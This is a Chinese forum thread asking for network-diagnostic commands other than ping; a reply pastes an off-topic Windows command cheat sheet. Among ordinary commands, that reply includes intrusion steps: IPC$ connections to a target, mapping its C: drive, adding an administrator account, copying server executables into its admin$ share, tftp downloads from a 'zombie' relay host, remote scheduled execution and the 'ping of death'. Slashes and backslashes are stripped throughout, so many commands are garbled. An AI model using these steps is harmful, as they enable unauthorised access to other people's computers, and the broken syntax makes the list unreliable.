查询网络质量有什么命令,除了ping以外

楼主(2013-04-29):
查询网络质量有什么命令,除了ping以外,最近老感觉网速不对,Ping一下也正常,但网页时不时的打不开,网上视频缓冲也时断时续的。有什么办法查一下

网友:
你打不开的网页那个域名你ping一下啊 别光ping那些近的地址

网友:
net use ipipc$   user  建立IPC空链接
net use ipipc$ 密码 user用户名 建立IPC非空链接
net use h ipc$ 密码 user用户名 直接登陆后映射对方C:到本地为H
net use h ipc$ 登陆后映射对方C:到本地为H
net use ipipc$ del 删除IPC链接
net use h del 删除映射对方到本地的为H的映射
net user 用户名 密码 add 建立用户
net user guest activeyes 激活guest用户
net user 查看有哪些用户
net user 帐户名 查看帐户的属性
net localgroup administrators 用户名 add 把“用户”添加到管理员中使其具有管理员权限,注意:administrator后加s用复数
net start 查看开启了哪些服务
net start 服务名  开启服务;(如net start telnet, net start schedule)
net stop 服务名 停止某服务
net time 目标ip 查看对方时间
net time 目标ip set 设置本地计算机时间与“目标IP”主机的时间同步,加上参数yes可取消确认信息
net view 查看本地局域网内开启了哪些共享
net view ip 查看对方局域网内开启了哪些共享
net config 显示系统网络设置
net logoff 断开连接的共享
net pause 服务名 暂停某服务
net send ip 文本信息 向对方发信息
net ver 局域网内正在使用的网络连接类型和信息
net share 查看本地开启的共享
net share ipc$ 开启ipc$共享
net share ipc$ del 删除ipc$共享
net share c$ del 删除C:共享
net user guest 12345 用guest用户登陆后用将密码改为12345
net password 密码 更改系统登陆密码
netstat -a 查看开启了哪些端口,常用netstat -an
netstat -n 查看端口的网络连接情况,常用netstat -an
netstat -v 查看正在进行的工作
netstat -p 协议名 例:netstat -p tcqip 查看某协议使用情况(查看tcpip协议使用情况)
netstat -s 查看正在使用的所有协议使用情况
nbtstat -A ip 对方136到139其中一个端口开了的话,就可查看对方最近登陆的用户名(03前的为用户名)-注意:参数-A要大写
tracert -参数 ip(或计算机名) 跟踪路由(数据包),参数:“-w数字”用于设置超时间隔。
ping ip(或域名) 向对方主机发送默认大小为32字节的数据,参数:“-l[空格]数据包大小”;“-n发送数据次数”;“-t”指一直ping。
ping -t -l 65550 ip 死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping)
ipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址,ipconfig可用参数“all”显示全部配置信息
tlist -t 以树行列表显示进程(为系统的附加工具,默认是没有安装的,在安装目录的Supporttools文件夹内)
kill -F 进程名 加-F参数后强制结束某进程(为系统的附加工具,默认是没有安装的,在安装目录的Supporttools文件夹内)
del -F 文件名 加-F参数后就可删除只读文件,AR、AH、AS、AA分别表示删除只读、隐藏、系统、存档文件,A-R、A-H、A-S、A-A表示删除除只读、隐藏、系统、存档以外的文件。例如“DELAR .”表示删除当前目录下所有只读文件,“DELA-S .”表示删除当前目录下除系统文件以外的所有文件
del S Q 目录 或用:rmdir s Q 目录 S删除目录及目录下的所有子目录和文件。同时使用参数Q 可取消删除操作时的系统确认就直接删除。(二个命令作用相同)
move 盘符路径要移动的文件名 存放移动文件的路径移动后文件名 移动文件,用参数y将取消确认移动目录存在相同文件的提示就直接覆盖
fc one.txt two.txt  3st.txt 对比二个文件并把不同之处输出到3st.txt文件中, 和  是重定向命令
at id号 开启已注册的某个计划任务
at delete 停止所有计划任务,用参数yes则不需要确认就直接停止
at id号 delete 停止某个已注册的计划任务
at 查看所有的计划任务
at ip time 程序名(或一个命令) r 在某时间运行对方某程序并重新启动计算机
finger username @host 查看最近有哪些用户登陆
telnet ip 端口 远和登陆服务器,默认端口为23
open ip 连接到IP(属telnet登陆后的命令)
telnet 在本机上直接键入telnet 将进入本机的telnet
copy 路径文件名1 路径文件名2 y 复制文件1到指定的目录为文件2,用参数y就同时取消确认你要改写一份现存目录文件
copy csrv.exe ipadmin$ 复制本地csrv.exe到对方的admin下
cppy 1st.jpgb+2st.txta  将2st.txt的内容藏身到1st.jpg中生成3st.jpg新的文件,注:2st.txt文件头要空三排,参数:b指二进制文件,a指ASCLL格式文件
copy ipadmin$svv.exe c 或copyipadmin$. 复制对方admini$共享下的srv.exe文件(所有文件)至本地C:
xcopy 要复制的文件或目录树 目标地址目录名 复制文件和目录树,用参数Y将不提示覆盖相同文件
tftp -i 自己IP(用肉机作跳板时这用肉机IP) get server.exe cserver.exe 登陆后,将“IP”的server.exe下载到目标主机cserver.exe 参数:-i指以二进制模式传送,如传送exe文件时用,如不加-i 则以ASCII模式(传送文本文件模式)进行传送
tftp -i 对方IP put cserver.exe 登陆后,上传本地cserver.exe至主机
ftp ip 端口 用于上传文件至服务器或进行文件操作,默认端口为21。bin指用二进制方式传送(可执行文件进);默认为ASCII格式传送(文本文件时)
route print 显示出IP路由,将主要显示网络地址Network addres,子网掩码Netmask,网关地址Gateway addres,接口地址Interface
arp 查看和处理ARP缓存,ARP是名字解析的意思,负责把一个IP解析成一个物理性的MAC地址。arp -a将显示出全部信息
start 程序名或命令 max 或min 新开一个新窗口并最大化(最小化)运行某程序或命令
mem 查看cpu使用情况
attrib 文件名(目录名) 查看某文件(目录)的属性
attrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的 存档,只读,系统,隐藏 属性;用+则是添加为某属性
dir 查看文件,参数:Q显示文件及目录属系统哪个用户,TC显示文件创建时间,TA显示文件上次被访问时间,TW上次被修改时间
date t 、 time t 使用此参数即“DATET”、“TIMET”将只显示当前日期和时间,而不必输入新日期和时间
set 指定环境变量名称=要指派给变量的字符 设置环境变量
set 显示当前所有的环境变量
set p(或其它字符) 显示出当前以字符p(或其它字符)开头的所有环境变量
pause 暂停批处理程序,并显示出:请按任意键继续....
if 在批处理程序中执行条件处理(更多说明见if命令及变量)
goto 标签 将cmd.exe导向到批处理程序中带标签的行(标签必须单独一行,且以冒号打头,例如:“:start”标签)
call 路径批处理文件名 从批处理程序中调用另一个批处理程序 (更多说明见call )
for 对一组文件中的每一个文件执行某个特定命令(更多说明见for命令及变量)
echo on或off 打开或关闭echo,仅用echo不加参数则显示当前echo设置
echo 信息 在屏幕上显示出信息
echo 信息  pass.txt 将信息保存到pass.txt文件中
findstr Hello aa.txt 在aa.txt文件中寻找字符串hello
find 文件名 查找某文件
title 标题名字 更改CMD窗口标题名字
color 颜色值 设置cmd控制台前景和背景颜色;0=黑、1=蓝、2=绿、3=浅绿、4=红、5=紫、6=黄、7=白、8=灰、9=淡蓝、A=淡绿、B=淡浅绿、C=淡红、D=淡紫、E=淡黄、F=亮白
prompt 名称 更改cmd.exe的显示的命令提示符(把C、D统一改为:EntSky )
ver 在DOS窗口下显示版本信息
winver 弹出一个窗口显示版本信息(内存大小、系统版本、补丁版本、计算机名)
format 盘符 FS类型 格式化磁盘,类型FAT、FAT32、NTFS ,例:Format D FSNTFS
md 目录名 创建目录
replace 源文件 要替换文件的目录 替换文件
ren 原文件名 新文件名 重命名文件名
tree 以树形结构显示出目录,用参数-f 将列出第个文件夹中文件名称
type 文件名 显示文本文件的内容
more 文件名 逐屏显示输出文件
doskey 要锁定的命令=字符
doskey 要解锁命令= 为DOS提供的锁定命令(编辑命令行,重新调用win2k命令,并创建宏)。如:锁定dir命令:doskey dir=entsky (不能用doskey dir=dir);解锁:doskey dir=
taskmgr 调出任务管理器
chkdsk F D 检查磁盘D并显示状态报告;加参数f并修复磁盘上的错误
tlntadmn telnt服务admn,键入tlntadmn选择3,再选择8,就可以更改telnet服务默认端口23为其它任何端口
exit 退出cmd.exe程序或目前,用参数B则是退出当前批处理脚本而不是cmd.exe
path 路径可执行文件的文件名 为可执行文件设置一个路径。
cmd 启动一个win2K命令解释窗口。参数:eff、en 关闭、开启命令扩展;更我详细说明见cmd
regedit s 注册表文件名 导入注册表;参数S指安静模式导入,无任何提示;
regedit e 注册表文件名 导出注册表
cacls 文件名 参数 显示或修改文件访问控制列表(ACL)--针对NTFS格式时。参数:D 用户名设定拒绝某用户访问;P 用户名perm 替换指定用户的访问权限;G 用户名perm 赋予指定用户访问权限;Perm 可以是 N 无,R 读取, W 写入, C 更改(写入),F 完全控制;例:cacls D est.txt D pub 设定d est.txt拒绝pub用户访问。
cacls 文件名 查看文件的访问用户权限列表
REM 文本内容 在批处理文件中添加注解
netsh 查看或更改本地网络配置情况